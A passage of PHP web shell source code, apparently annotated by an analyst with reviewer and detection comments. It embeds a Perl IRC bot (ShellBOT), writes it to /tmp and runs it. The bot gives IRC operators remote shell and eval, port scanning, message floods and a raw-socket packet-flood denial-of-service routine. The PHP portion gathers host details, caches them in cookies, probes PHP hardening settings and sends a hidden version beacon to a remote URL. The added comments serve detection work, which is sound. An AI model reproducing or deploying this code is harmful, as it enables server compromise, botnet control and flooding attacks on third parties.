3175    my \$servarg = shift;
3176    if (\$servarg =~ /^PING \:(.*)/) {
3177      sendraw(\"PONG :$1\");
3178    } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
3179        my \$pn=$1; my \$onde = $4; my \$args = $5;
3180        if (\$args =~ /^\&#92;&#48;01VERSION\&#92;&#48;01$/) {
3181          notice(\"\$pn\", \"\&#92;&#48;01VERSION ShellBOT-\$VERSAO por 0ldW0lf\&#92;&#48;01\");
3182        }
3183        if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
3184          if (\$onde eq \"\$meunick\"){
3185            shell(\"\$pn\", \"\$args\");
3186          }
3187          if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
3188             my \$natrix = $1;
3189             my \$arg = $2;
3190             if (\$arg =~ /^\!(.*)/) {
3191               ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
3192             } elsif (\$arg =~ /^\@(.*)/) {
3193                 \$ondep = \$onde;
3194                 \$ondep = \$pn if \$onde eq \$meunick;
3195                 bfunc(\"\$ondep\",\"$1\");
3196             } else {
3197                 shell(\"\$onde\", \"\$arg\");
3198             }
3199          }
3200        }
3201    } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
3202        if (lc($1) eq lc(\$meunick)) {
3203          \$meunick=$4;
3204          \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3205        }
3206    } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
3207        nick(\"\$meunick\".int rand(9999));
3208    } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
3209        \$meunick = $2;
3210        \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3211        \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
3212        foreach my \$canal (@canais) {
3213          sendraw(\"JOIN \$canal\");
3214        }
3215    }
3216 }
3217 
3218 ###
3219 ###
3220 ###
3221 ###
3222 ###
3223 ###
3224 ###
3225 ###
3226 ###
3227 ###
3228 ###
3229 ###
3230 ###
3231 sub bfunc {
3232   my \$printl = \$_[0];
3233   my \$funcarg = \$_[1];
3234   if (my \$pid = fork) {
3235      waitpid(\$pid, 0);
3236   } else {
3237       if (fork) {
3238          exit;
3239        } else {
3240            if (\$funcarg =~ /^portscan (.*)/) {
3241              my \$hostip=\"$1\";
3242              my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
3243              my (@aberta, %porta_banner);
3244              foreach my \$porta (@portas) {
3245                 my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
3246                 if (\$scansock) {
3247                    push (@aberta, \$porta);
3248                    \$scansock->close;
3249                 }
3250              }
3251              if (@aberta) {
3252                sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
3253              } else {
3254                  sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
3255              }
3256            }
3257            if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
3258              my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
3259              \$dtime = 1 if \$dtime == 0;
3260              my %bytes;
3261              \$bytes{igmp} = $2 * \$pacotes{igmp};
3262              \$bytes{icmp} = $2 * \$pacotes{icmp};
3263              \$bytes{o} = $2 * \$pacotes{o};
3264              \$bytes{udp} = $2 * \$pacotes{udp};
3265              \$bytes{tcp} = $2 * \$pacotes{tcp};
3266              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02 - Status GERAL -\&#92;&#48;02\");
3267              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Tempo\&#92;&#48;02: \$dtime\".\"s\");
3268              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Total pacotes\&#92;&#48;02: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
3269              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Total bytes\&#92;&#48;02: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
3270              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Média de envio\&#92;&#48;02: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
3271            }
3272            exit;
3273        }
3274   }
3275 }
3276 
3277 ###
3278 ###
3279 ###
3280 ###
3281 ###
3282 ###
3283 ###
3284 ###
3285 ###
3286 ###
3287 ###
3288 ###
3289 ###
3290 
3291 sub ircase {
3292   my (\$kem, \$printl, \$case) = @_;
3293 
3294   if (\$case =~ /^join (.*)/) {
3295      j(\"$1\");
3296    }
3297    if (\$case =~ /^part (.*)/) {
3298       p(\"$1\");
3299    }
3300    if (\$case =~ /^rejoin\s+(.*)/) {
3301       my \$chan = $1;
3302       if (\$chan =~ /^(\d+) (.*)/) {
3303         for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
3304           p(\"$2\");
3305           j(\"$2\");
3306         }
3307       } else {
3308           p(\"\$chan\");
3309           j(\"\$chan\");
3310       }
3311    }
3312    if (\$case =~ /^op/) {
3313       op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
3314       my \$oarg = substr(\$case, 3);
3315       op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3316    }
3317    if (\$case =~ /^deop/) {
3318       deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
3319       my \$oarg = substr(\$case, 5);
3320       deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3321    }
3322    if (\$case =~ /^voice/) {
3323       voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
3324       \$oarg = substr(\$case, 6);
3325       voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3326    }
3327    if (\$case =~ /^devoice/) {
3328       devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
3329       \$oarg = substr(\$case, 8);
3330       devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3331    }
3332    if (\$case =~ /^msg\s+(\S+) (.*)/) {
3333       msg(\"$1\", \"$2\");
3334    }
3335    if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
3336       for (my \$cf = 1; \$cf <= $1; \$cf++) {
3337         msg(\"$2\", \"$3\");
3338       }
3339    }
3340    if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
3341       ctcp(\"$1\", \"$2\");
3342    }
3343    if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
3344       for (my \$cf = 1; \$cf <= $1; \$cf++) {
3345         ctcp(\"$2\", \"$3\");
3346       }
3347    }
3348    if (\$case =~ /^invite\s+(\S+) (.*)/) {
3349       invite(\"$1\", \"$2\");
3350    }
3351    if (\$case =~ /^nick (.*)/) {
3352       nick(\"$1\");
3353    }
3354    if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
3355        conectar(\"$2\", \"$1\", 6667);
3356    }
3357    if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
3358       DCC::SEND(\"$1\", \"$2\");
3359    }
3360    if (\$case =~ /^raw (.*)/) {
3361       sendraw(\"$1\");
3362    }
3363    if (\$case =~ /^eval (.*)/) {
3364      eval \"$1\";
3365    }
3366 }
3367 
3368 ###
3369 ###
3370 ###
3371 ###
3372 ###
3373 ###
3374 ###
3375 ###
3376 ###
3377 ###
3378 ###
3379 ###
3380 ###
3381 sub shell {
3382   return unless \$secv;
3383   my \$printl=\$_[0];
3384   my \$comando=\$_[1];
3385   if (\$comando =~ /cd (.*)/) {
3386     chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> \");
3387     return;
3388   }
3389   elsif (\$pid = fork) {
3390      waitpid(\$pid, 0);
3391   } else {
3392       if (fork) {
3393          exit;
3394        } else {
3395            my @resp=`\$comando 2>&1 3>&1`;
3396            my \$c=0;
3397            foreach my \$linha (@resp) {
3398              \$c++;
3399              chop \$linha;
3400              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
3401              if (\$c == \"\$linas_max\") {
3402                \$c=0;
3403                sleep \$sleep;
3404              }
3405            }
3406            exit;
3407        }
3408   }
3409 }
3410 #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
3411 sub attacker {
3412   my \$iaddr = inet_aton(\$_[0]);
3413   my \$msg = 'B' x \$_[1];
3414   my \$ftime = \$_[2];
3415   my \$cp = 0;
3416   my (%pacotes);
3417   \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
3418   socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
3419   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
3420   socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
3421   socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
3422   return(undef) if \$cp == 4;
3423   my \$itime = time;
3424   my (\$cur_time);
3425   while ( 1 ) {
3426      for (my \$porta = 1; \$porta <= 65535; \$porta++) {
3427        \$cur_time = time - \$itime;
3428        last if \$cur_time >= \$ftime;
3429        send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
3430        send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
3431        send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
3432        send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
3433        # DoS ?? <img src="/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley" />
3434        for (my \$pc = 3; \$pc <= 255;\$pc++) {
3435          next if \$pc == 6;
3436          \$cur_time = time - \$itime;
3437          last if \$cur_time >= \$ftime;
3438          socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
3439          send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
3440        }
3441      }
3442      last if \$cur_time >= \$ftime;
3443   }
3444   return(\$cur_time, %pacotes);
3445 }
3446 
3447 ###
3448 ###
3449 ###
3450 ###
3451 ###
3452 ####
3453 # ALIASES #
3454 
3455 ###
3456 ###
3457 ###
3458 ###
3459 ###
3460 ####
3461 sub action {
3462    return unless $#_ == 1;
3463    sendraw(\"PRIVMSG \$_[0] :\&#92;&#48;01ACTION \$_[1]\&#92;&#48;01\");
3464 }
3465 sub ctcp {
3466    return unless $#_ == 1;
3467    sendraw(\"PRIVMSG \$_[0] :\&#92;&#48;01\$_[1]\&#92;&#48;01\");
3468 }
3469 sub msg {
3470    return unless $#_ == 1;
3471    sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
3472 }
3473 sub notice {
3474    return unless $#_ == 1;
3475    sendraw(\"NOTICE \$_[0] :\$_[1]\");
3476 }
3477 sub op {
3478    return unless $#_ == 1;
3479    sendraw(\"MODE \$_[0] +o \$_[1]\");
3480 }
3481 sub deop {
3482    return unless $#_ == 1;
3483    sendraw(\"MODE \$_[0] -o \$_[1]\");
3484 }
3485 sub hop {
3486     return unless $#_ == 1;
3487    sendraw(\"MODE \$_[0] +h \$_[1]\");
3488 }
3489 sub dehop {
3490    return unless $#_ == 1;
3491    sendraw(\"MODE \$_[0] +h \$_[1]\");
3492 }
3493 sub voice {
3494    return unless $#_ == 1;
3495    sendraw(\"MODE \$_[0] +v \$_[1]\");
3496 }
3497 sub devoice {
3498    return unless $#_ == 1;
3499    sendraw(\"MODE \$_[0] -v \$_[1]\");
3500 }
3501 sub ban {
3502    return unless $#_ == 1;
3503    sendraw(\"MODE \$_[0] +b \$_[1]\");
3504 }
3505 sub unban {
3506    return unless $#_ == 1;
3507    sendraw(\"MODE \$_[0] -b \$_[1]\");
3508 }
3509 sub kick {
3510    return unless $#_ == 1;
3511    sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
3512 }
3513 sub modo {
3514    return unless $#_ == 0;
3515    sendraw(\"MODE \$_[0] \$_[1]\");
3516 }
3517 sub mode { modo(@_); }
3518 sub j { &join(@_); }
3519 sub join {
3520    return unless $#_ == 0;
3521    sendraw(\"JOIN \$_[0]\");
3522 }
3523 sub p { part(@_); }
3524 sub part {sendraw(\"PART \$_[0]\");}
3525 sub nick {
3526   return unless $#_ == 0;
3527   sendraw(\"NICK \$_[0]\");
3528 }
3529 sub invite {
3530    return unless $#_ == 1;
3531    sendraw(\"INVITE \$_[1] \$_[0]\");
3532 }
3533 sub topico {
3534    return unless $#_ == 1;
3535    sendraw(\"TOPIC \$_[0] \$_[1]\");
3536 }
3537 sub topic { topico(@_); }
3538 sub whois {
3539   return unless $#_ == 0;
3540   sendraw(\"WHOIS \$_[0]\");
3541 }
3542 sub who {
3543   return unless $#_ == 0;
3544   sendraw(\"WHO \$_[0]\");
3545 }
3546 sub names {
3547   return unless $#_ == 0;
3548   sendraw(\"NAMES \$_[0]\");
3549 }
3550 sub away {
3551   sendraw(\"AWAY \$_[0]\");
3552 }
3553 sub back { away(); }
3554 sub quit {
3555   sendraw(\"QUIT :\$_[0]\");
3556 }
3557 # DCC
3558 
3559 ###
3560 ###
3561 ###
3562 ###
3563 ###
3564 ###
3565 ###
3566 ###
3567 ###
3568 ###
3569 ###
3570 ####
3571 package DCC;
3572 sub connections {
3573    my @ready = \$dcc_sel->can_read(1);
3574 # return unless (@ready);
3575    foreach my \$fh (@ready) {
3576      my \$dcctipo = \$DCC{\$fh}{tipo};
3577      my \$arquivo = \$DCC{\$fh}{arquivo};
3578      my \$bytes = \$DCC{\$fh}{bytes};
3579      my \$cur_byte = \$DCC{\$fh}{curbyte};
3580      my \$nick = \$DCC{\$fh}{nick};
3581 
3582      my \$msg;
3583      my \$nread = sysread(\$fh, \$msg, 10240);
3584      if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
3585         \$DCC{\$fh}{status} = \"Cancelado\";
3586         \$DCC{\$fh}{ftime} = time;
3587         \$dcc_sel->remove(\$fh);
3588         \$fh->close;
3589         next;
3590      }
3591      if (\$dcctipo eq \"get\") {
3592         \$DCC{\$fh}{curbyte} += length(\$msg);
3593         my \$cur_byte = \$DCC{\$fh}{curbyte};
3594         open(FILE, \">> \$arquivo\");
3595         print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
3596         close(FILE);
3597         my \$packbyte = pack(\"N\", \$cur_byte);
3598         print \$fh \"\$packbyte\";
3599 
3600         if (\$bytes == \$cur_byte) {
3601            \$dcc_sel->remove(\$fh);
3602            \$fh->close;
3603            \$DCC{\$fh}{status} = \"Recebido\";
3604            \$DCC{\$fh}{ftime} = time;
3605            next;
3606         }
3607      } elsif (\$dcctipo eq \"send\") {
3608           my \$send = \$fh->accept;
3609           \$send->autoflush(1);
3610           \$dcc_sel->add(\$send);
3611           \$dcc_sel->remove(\$fh);
3612           \$DCC{\$send}{tipo} = 'sendcon';
3613           \$DCC{\$send}{itime} = time;
3614           \$DCC{\$send}{nick} = \$nick;
3615           \$DCC{\$send}{bytes} = \$bytes;
3616           \$DCC{\$send}{curbyte} = 0;
3617           \$DCC{\$send}{arquivo} = \$arquivo;
3618           \$DCC{\$send}{ip} = \$send->peerhost;
3619           \$DCC{\$send}{porta} = \$send->peerport;
3620           \$DCC{\$send}{status} = \"Enviando\";
3621           #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
3622           open(FILE, \"< \$arquivo\");
3623           my \$fbytes;
3624           read(FILE, \$fbytes, 1024);
3625           print \$send \"\$fbytes\";
3626           close FILE;
3627 # delete(\$DCC{\$fh});
3628 } elsif (\$dcctipo eq 'sendcon') {
3629           my \$bytes_sended = unpack(\"N\", \$msg);
3630           \$DCC{\$fh}{curbyte} = \$bytes_sended;
3631           if (\$bytes_sended == \$bytes) {
3632              \$fh->close;
3633              \$dcc_sel->remove(\$fh);
3634              \$DCC{\$fh}{status} = \"Enviado\";
3635              \$DCC{\$fh}{ftime} = time;
3636              next;
3637           }
3638           open(SENDFILE, \"< \$arquivo\");
3639           seek(SENDFILE, \$bytes_sended, 0);
3640           my \$send_bytes;
3641           read(SENDFILE, \$send_bytes, 1024);
3642           print \$fh \"\$send_bytes\";
3643           close(SENDFILE);
3644      }
3645    }
3646 }
3647 
3648 ###
3649 ###
3650 ###
3651 ###
3652 ###
3653 ###
3654 ###
3655 ###
3656 ###
3657 ###
3658 ###
3659 ###
3660 ###
3661 sub SEND {
3662   my (\$nick, \$arquivo) = @_;
3663   unless (-r \"\$arquivo\") {
3664     return(0);
3665   }
3666   my \$dccark = \$arquivo;
3667   \$dccark =~ s/[.*\/](\S+)/$1/;
3668   my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
3669   my \$longip = unpack(\"N\",inet_aton(\$meuip));
3670   my @filestat = stat(\$arquivo);
3671   my \$size_total=\$filestat[7];
3672   if (\$size_total == 0) {
3673      return(0);
3674   }
3675   my (\$porta, \$sendsock);
3676   do {
3677     \$porta = int rand(64511);
3678     \$porta += 1024;
3679     \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
3680   } until \$sendsock;
3681   \$DCC{\$sendsock}{tipo} = 'send';
3682   \$DCC{\$sendsock}{nick} = \$nick;
3683   \$DCC{\$sendsock}{bytes} = \$size_total;
3684   \$DCC{\$sendsock}{arquivo} = \$arquivo;
3685   &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
3686 }
3687 sub GET {
3688   my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
3689   return(0) if (-e \"\$arquivo\");
3690   if (open(FILE, \"> \$arquivo\")) {
3691      close FILE;
3692   } else {
3693     return(0);
3694   }
3695   my \$dccip=fixaddr(\$dcclongip);
3696   return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
3697   my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
3698   \$dccsock->autoflush(1);
3699   \$dcc_sel->add(\$dccsock);
3700   \$DCC{\$dccsock}{tipo} = 'get';
3701   \$DCC{\$dccsock}{itime} = time;
3702   \$DCC{\$dccsock}{nick} = \$nick;
3703   \$DCC{\$dccsock}{bytes} = \$bytes;
3704   \$DCC{\$dccsock}{curbyte} = 0;
3705   \$DCC{\$dccsock}{arquivo} = \$arquivo;
3706   \$DCC{\$dccsock}{ip} = \$dccip;
3707   \$DCC{\$dccsock}{porta} = \$dccporta;
3708   \$DCC{\$dccsock}{status} = \"Recebendo\";
3709 }
3710 
3711 ###
3712 ###
3713 ###
3714 ###
3715 ###
3716 ###
3717 ###
3718 ###
3719 ###
3720 ###
3721 ###
3722 ###
3723 ###
3724 ###
3725 # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
3726 sub Status {
3727   my \$socket = shift;
3728   my \$sock_tipo = \$DCC{\$socket}{tipo};
3729   unless (lc(\$sock_tipo) eq \"chat\") {
3730     my \$nick = \$DCC{\$socket}{nick};
3731     my \$arquivo = \$DCC{\$socket}{arquivo};
3732     my \$itime = \$DCC{\$socket}{itime};
3733     my \$ftime = time;
3734     my \$status = \$DCC{\$socket}{status};
3735     \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
3736     my \$d_time = \$ftime-\$itime;
3737     my \$cur_byte = \$DCC{\$socket}{curbyte};
3738     my \$bytes_total = \$DCC{\$socket}{bytes};
3739     my \$rate = 0;
3740     \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
3741     my \$porcen = (\$cur_byte*100)/\$bytes_total;
3742     my (\$r_duv, \$p_duv);
3743     if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
3744        \$r_duv = $3; \$r_duv++ if $4 >= 5;
3745        \$rate = \"$1\.$2\".\"\$r_duv\";
3746     }
3747     if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
3748        \$p_duv = $3; \$p_duv++ if $4 >= 5;
3749        \$porcen = \"$1\.$2\".\"\$p_duv\";
3750     }
3751     return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
3752   }
3753   return(0);
3754 }
3755 # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
3756 sub fixaddr {
3757     my (\$address) = @_;
3758     chomp \$address; # just in case, sigh.
3759     if (\$address =~ /^\d+$/) {
3760         return inet_ntoa(pack \"N\", \$address);
3761     } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
3762         return \$address;
3763     } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
3764         return inet_ntoa(((gethostbyname(\$address))[4])[0]);
3765     } else {
3766         return;
3767     }
3768 }
3769 
3770 ###
3771 ###
3772 ###
3773 ###
3774 ###
3775 ###
3776 ###
3777 ###
3778 ###
3779 ###
3780 ###
3781 ###
3782 ###
3783 ###
3784 ";
3785 $bot = "/tmp/ircs.pl";
3786 $open = fopen($bot,"w");
3787 fputs($open,$file);
3788 fclose($open);
3789 $cmd="perl $bot";
3790 $cmd2="rm $bot";
3791 system($cmd);
3792 system($cmd2);
3793 $_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
3794 }
// On Unix hosts: collect `uname -a`, `id` and sysctl OS details once and cache them in
// client cookies named uname / id / sysctl; later requests reuse the cookie values
// instead of running the commands again.
// NOTE(review): ex() is defined outside this excerpt; presumably it runs a shell command - confirm.
// Detection: requests carrying cookies called uname, id or sysctl whose values look like
// command output are a recognisable trait of this shell wherever cookies are logged.
// The cookie values are taken as-is and echoed further down the page without HTML escaping.
3795 if($unix)
3796  {
3797  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
3798  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
// With safe_mode on, no sysctl command is attempted and a '-' placeholder is shown instead.
3799  if($safe_mode) { $sysctl = '-'; }
3800  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
3801  else
3802   {
// Tries the kern.* sysctl names first, then the kernel.* names, then falls back to '-'.
3803    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
3804    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
3805    if(empty($sysctl)) { $sysctl = '-'; }
3806    setcookie('sysctl',$sysctl);
3807   }
3808  }
// Emits the page head, then - only when no command was posted - a "version check" beacon.
// The beacon fires when the first octet of SERVER_ADDR is not one of 127, 192, 172 or 10.
// It does two things: prints a zero-size <img> (fetched by the operator's browser) and
// calls readfile() on a URL (fetched by the web server itself). Both carry the shell
// version with the dots removed.
// NOTE(review): the host in this copy is 127.0.0.1; possibly a placeholder that replaced the
// original call-home address - confirm against other samples.
// NOTE(review): only the first octet is compared (loosely), so this is not an accurate
// private-address test; any 172.x or 192.x address also suppresses the beacon.
// Detection: outbound HTTP from the PHP/web-server process to .../version.php?version=<digits>,
// and the same path with img=1 requested by a browser that has just loaded the page.
3809 echo $head;
3810 echo '</head>';
3811 if(empty($_POST['cmd'])) {
3812 $serv = array(127,192,172,10);
3813 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
3814 $current_version = str_replace('.','',$version);
3815 if (!in_array($addr[0], $serv)) {
// Both calls are prefixed with @, so a failed fetch produces no visible error.
3816 @print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
3817 @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
// Prints the page banner (the "SnIpEr_SA" logo text), the server date/time and the top menu.
// Each menu entry links back to this same script with a bare query-string marker:
// ?sqlman, ?phpinfo, ?phpini, ?cpu, ?mem, ?users (the last three on Unix only), ?tmp, ?delete.
// Detection: these markers, requested against one PHP file, are useful access-log search terms.
// $_SERVER['PHP_SELF'] is written into the href attributes without escaping or quoting.
// The "????" runs are label text whose original encoding was lost in this copy.
3818 echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Wingdings size=3><b>N</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
3819 style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
3820 <SPAN
3821 style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">SnIpEr_SA</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
3822 echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
3823 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>????????</b></a> ".$rb;
3824 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
3825 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
3826 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
3827 if($unix)
3828  {
3829  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
3830  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
3831  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
3832  }
3833 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
3834 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
// Environment report shown to whoever loads the shell: safe_mode state, PHP version,
// whether the curl, MySQL, MSSQL, PostgreSQL and Oracle client functions exist,
// the disable_functions list, free/total disk space for $dir, register_globals and open_basedir.
// Reviewer note: this is a survey of the host's PHP hardening. The same settings it reads
// (disable_functions, open_basedir) are the ones a defender sets to limit a script like this.
// The "????" runs are label text whose original encoding was lost in this copy.
3835 echo ws(2)."????? ?????: <b>";
3836 echo (($safe_mode)?("<font color=#008000>????</font>"):("<font color=red>??? ????</font>"));
3837 echo "</b>".ws(2);
3838 echo "????? ???? ??? ??: <b>".@phpversion()."</b>";
// Extension availability is probed with function_exists() on one function per extension.
3839 $curl_on = @function_exists('curl_version');
3840 echo ws(2);
3841 echo "??????: <b>".(($curl_on)?("<font color=#008000>????</font>"):("<font color=red>??? ????</font>"));
3842 echo "</b>".ws(2);
3843 echo "??? ???: <b>";
3844 $mysql_on = @function_exists('mysql_connect');
3845 if($mysql_on){
3846 echo "<font color=#008000>????</font>"; } else { echo "<font color=red>??? ????</font>"; }
3847 echo "</b>".ws(2);
3848 echo "?? ?? ???: <b>";
3849 $mssql_on = @function_exists('mssql_connect');
3850 if($mssql_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>??? ????</font>";}
3851 echo "</b>".ws(2);
3852 echo "???? ??? ???: <b>";
3853 $pg_on = @function_exists('pg_connect');
3854 if($pg_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>??? ????</font>";}
3855 echo "</b>".ws(2);
3856 echo "??????: <b>";
3857 $ora_on = @function_exists('ocilogon');
3858 if($ora_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>????</font>";}
3859 echo "</b><br>".ws(2);
3860 echo "?????? ???????? : <b>";
// An empty disable_functions value is shown in green; a non-empty list is printed verbatim in red.
3861 if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>??????</font></b>";}else{echo "<font color=red>$df</font></b>";}
// Disk figures for $dir (set outside this excerpt); a failed lookup is shown as 0.
3862 $free = @diskfreespace($dir);
3863 if (!$free) {$free = 0;}
3864 $all = @disk_total_space($dir);
3865 if (!$all) {$all = 0;}
3866 echo "<br>".ws(2)."??????? ??????? : <b>".view_size($free)."</b> ??????? ??????: <b>".view_size($all)."</b>";
3867 echo "</b><br>".ws(2);
3868 echo "Register globals: <b>";
3869 $reg_g = @ini_get("register_globals");
3870 if($reg_g){
3871 echo "<font color=#008000>????</font>"; } else { echo "<font color=red>??? ????</font>"; }
3872 echo "</b>".ws(2);
3873 echo "open_basedir: <b>";
// Colours are inverted here compared with the checks above: a configured open_basedir prints in red.
3874 $openbasedi = @ini_get("open_basedir");
3875 if($openbasedi){
3876 echo "<font color=red>????</font>"; } else { echo "<font color=#008000>??? ????</font>"; }
3877 echo "</b>".ws(2);
